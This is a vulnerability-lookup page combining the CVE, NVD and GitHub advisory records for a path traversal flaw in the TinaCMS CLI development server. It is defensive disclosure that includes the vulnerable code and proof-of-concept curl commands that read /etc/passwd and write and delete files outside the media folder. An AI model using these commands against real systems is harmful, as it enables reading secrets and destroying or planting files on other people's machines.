CVE-2026-28793 (GCVE-0-2026-28793)
Vulnerability from cvelistv5 – Published: 2026-03-12 16:50 – Updated: 2026-03-13 16:28
VLAI?
Title
Path Traversal Leading to Arbitrary File Read, Write and Delete in TinaCMS
Summary
Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8.
Severity ?
8.4 (High)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-28793",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-13T16:28:28.663530Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-13T16:28:33.184Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "cli",
"vendor": "@tinacms",
"versions": [
{
"status": "affected",
"version": "\u003c 2.1.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-12T16:50:20.132Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
}
],
"source": {
"advisory": "GHSA-2f24-mg4x-534q",
"discovery": "UNKNOWN"
},
"title": "Path Traversal Leading to Arbitrary File Read, Write and Delete in TinaCMS"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-28793",
"datePublished": "2026-03-12T16:50:20.132Z",
"dateReserved": "2026-03-03T14:25:19.245Z",
"dateUpdated": "2026-03-13T16:28:33.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-28793\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-12T17:16:50.543\",\"lastModified\":\"2026-03-13T19:58:55.173\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8.\"},{\"lang\":\"es\",\"value\":\"Tina es un sistema de gesti\u00f3n de contenido sin cabeza. Antes de 2.1.8, el servidor de desarrollo CLI de TinaCMS expone puntos finales de medios que son vulnerables a salto de ruta, permitiendo a los atacantes leer y escribir archivos arbitrarios en el sistema de archivos fuera del directorio de medios previsto. Al ejecutar tinacms dev, la CLI inicia un servidor HTTP local (puerto predeterminado 4001) exponiendo puntos finales como /media/list/*, /media/upload/* y /media/*. Estos puntos finales procesan segmentos de ruta controlados por el usuario usando decodeURI() y path.join() sin validar que la ruta resuelta permanezca dentro del directorio de medios configurado. Esta vulnerabilidad est\u00e1 corregida en 2.1.8.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.5,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ssw:tinacms\\\\/cli:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"2.1.8\",\"matchCriteriaId\":\"1CE10330-2151-486B-AF99-38DC3D2F8FA0\"}]}]}],\"references\":[{\"url\":\"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-28793\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-13T16:28:28.663530Z\"}}}], \"references\": [{\"url\": \"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-13T16:28:21.597Z\"}}], \"cna\": {\"title\": \"Path Traversal Leading to Arbitrary File Read, Write and Delete in TinaCMS\", \"source\": {\"advisory\": \"GHSA-2f24-mg4x-534q\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.4, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"@tinacms\", \"product\": \"cli\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.1.8\"}]}], \"references\": [{\"url\": \"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q\", \"name\": \"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-12T16:50:20.132Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-28793\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-13T16:28:33.184Z\", \"dateReserved\": \"2026-03-03T14:25:19.245Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-12T16:50:20.132Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-28793
Vulnerability from fkie_nvd - Published: 2026-03-12 17:16 - Updated: 2026-03-13 19:58
Severity ?
Summary
Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q | Exploit, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ssw | tinacms\/cli | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ssw:tinacms\\/cli:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "1CE10330-2151-486B-AF99-38DC3D2F8FA0",
"versionEndExcluding": "2.1.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8."
},
{
"lang": "es",
"value": "Tina es un sistema de gesti\u00f3n de contenido sin cabeza. Antes de 2.1.8, el servidor de desarrollo CLI de TinaCMS expone puntos finales de medios que son vulnerables a salto de ruta, permitiendo a los atacantes leer y escribir archivos arbitrarios en el sistema de archivos fuera del directorio de medios previsto. Al ejecutar tinacms dev, la CLI inicia un servidor HTTP local (puerto predeterminado 4001) exponiendo puntos finales como /media/list/*, /media/upload/* y /media/*. Estos puntos finales procesan segmentos de ruta controlados por el usuario usando decodeURI() y path.join() sin validar que la ruta resuelta permanezca dentro del directorio de medios configurado. Esta vulnerabilidad est\u00e1 corregida en 2.1.8."
}
],
"id": "CVE-2026-28793",
"lastModified": "2026-03-13T19:58:55.173",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.5,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-12T17:16:50.543",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-2F24-MG4X-534Q
Vulnerability from github – Published: 2026-03-12 20:32 – Updated: 2026-03-12 20:32
VLAI?
Summary
TinaCMS Vulnerable to Path Traversal Leading to Arbitrary File Read, Write and Delete
Details
Summary
The TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory.
Details
When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as:
-
/media/list/*
-
/media/upload/*
-
/media/*
These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory.
Vulnerable code
bb.on('file', async (_name, file, _info) => {
const fullPath = decodeURI(req.url?.slice('/media/upload/'.length));
const saveTo = path.join(mediaFolder, ...fullPath.split('/'));
// No validation that saveTo remains within mediaFolder
await fs.ensureDir(path.dirname(saveTo));
file.pipe(fs.createWriteStream(saveTo));
});
PoC
Arbitrary File Read
curl "http://localhost:4001/media/list/../../../etc/passwd"
Result:
Arbitrary File Write
echo "ATTACKER_CONTROLLED_CONTENT" > /tmp/payload.txt
curl --path-as-is -X POST \
"http://localhost:4001/media/upload/../../../../../../tmp/pwned.txt" \
-F "file=@/tmp/payload.txt"
cat /tmp/pwned.txt
Result:
Arbitrary File Delete
echo "delete_me" > /tmp/delete-test.txt
cat /tmp/delete-test.txt # confirms file exists
curl --path-as-is -X DELETE \
"http://localhost:4001/media/../../../../../../tmp/delete-test.txt"
cat /tmp/delete-test.txt # "No such file or directory"
Impact
An attacker who can reach the TinaCMS CLI dev server can:
-
Read arbitrary files (e.g. /etc/passwd, .env, SSH keys)
-
Write arbitrary files anywhere writable by the server process
-
Delete or overwrite files, depending on endpoint usage
-
Escalate to code execution in realistic development setups by overwriting executable scripts, configuration files, or watched source files
Attack Surface
The dev server binds to localhost by default, but exploitation is realistic in:
-
Cloud IDEs (Codespaces, Gitpod)
-
Docker or VM setups with port forwarding
-
Misconfigured dev environments binding to 0.0.0.0
-
Local malware or malicious dependencies
The server also enables permissive CORS, which may allow browser-based exploitation if the dev server is externally reachable, but CORS is not required for exploitation.
Recommended Fix
-
Resolve paths to absolute form
-
Enforce that resolved paths remain within the media root
-
Reject .. path segments and absolute paths
-
Consider authentication or token protection for dev server endpoints
Severity ?
8.4 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@tinacms/cli"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28793"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-12T20:32:26Z",
"nvd_published_at": "2026-03-12T17:16:50Z",
"severity": "HIGH"
},
"details": "## Summary\nThe TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory.\n\n## Details\nWhen running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as:\n\n- /media/list/*\n\n- /media/upload/*\n\n- /media/*\n\nThese endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory.\n\n### Vulnerable code\n```\nbb.on(\u0027file\u0027, async (_name, file, _info) =\u003e {\n const fullPath = decodeURI(req.url?.slice(\u0027/media/upload/\u0027.length));\n const saveTo = path.join(mediaFolder, ...fullPath.split(\u0027/\u0027));\n// No validation that saveTo remains within mediaFolder\n await fs.ensureDir(path.dirname(saveTo));\n file.pipe(fs.createWriteStream(saveTo));\n });\n```\n## PoC\n**Arbitrary File Read**\n```\ncurl \"http://localhost:4001/media/list/../../../etc/passwd\"\n```\n\nResult:\n\n\u003cimg width=\"889\" height=\"280\" alt=\"image(1)\" src=\"https://github.com/user-attachments/assets/a878a86a-71db-46ed-abda-3d4ddba692e0\" /\u003e\n\n\n**Arbitrary File Write**\n```\necho \"ATTACKER_CONTROLLED_CONTENT\" \u003e /tmp/payload.txt\n\ncurl --path-as-is -X POST \\\n \"http://localhost:4001/media/upload/../../../../../../tmp/pwned.txt\" \\\n -F \"file=@/tmp/payload.txt\"\ncat /tmp/pwned.txt\n```\nResult:\n\u003cimg width=\"1320\" height=\"84\" alt=\"image(8)\" src=\"https://github.com/user-attachments/assets/8bd5046b-0456-474f-ab96-4e18a421997c\" /\u003e\n\n**Arbitrary File Delete**\n```\necho \"delete_me\" \u003e /tmp/delete-test.txt\ncat /tmp/delete-test.txt # confirms file exists\ncurl --path-as-is -X DELETE \\\n\"http://localhost:4001/media/../../../../../../tmp/delete-test.txt\"\ncat /tmp/delete-test.txt # \"No such file or directory\"\n```\n\u003cimg width=\"1135\" height=\"105\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64c24b83-0259-4a12-969d-98c8e8cc81ca\" /\u003e\n\n## Impact\n\nAn attacker who can reach the TinaCMS CLI dev server can:\n\n- Read arbitrary files (e.g. /etc/passwd, .env, SSH keys)\n\n- Write arbitrary files anywhere writable by the server process\n\n- Delete or overwrite files, depending on endpoint usage\n\n- Escalate to code execution in realistic development setups by overwriting executable scripts, configuration files, or watched source files\n\n## Attack Surface\n\nThe dev server binds to localhost by default, but exploitation is realistic in:\n\n- Cloud IDEs (Codespaces, Gitpod)\n\n- Docker or VM setups with port forwarding\n\n- Misconfigured dev environments binding to 0.0.0.0\n\n- Local malware or malicious dependencies\n\nThe server also enables permissive CORS, which may allow browser-based exploitation if the dev server is externally reachable, but CORS is not required for exploitation.\n\n## Recommended Fix\n\n- Resolve paths to absolute form\n\n- Enforce that resolved paths remain within the media root\n\n- Reject .. path segments and absolute paths\n\n- Consider authentication or token protection for dev server endpoints",
"id": "GHSA-2f24-mg4x-534q",
"modified": "2026-03-12T20:32:26Z",
"published": "2026-03-12T20:32:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28793"
},
{
"type": "PACKAGE",
"url": "https://github.com/tinacms/tinacms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "TinaCMS Vulnerable to Path Traversal Leading to Arbitrary File Read, Write and Delete"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…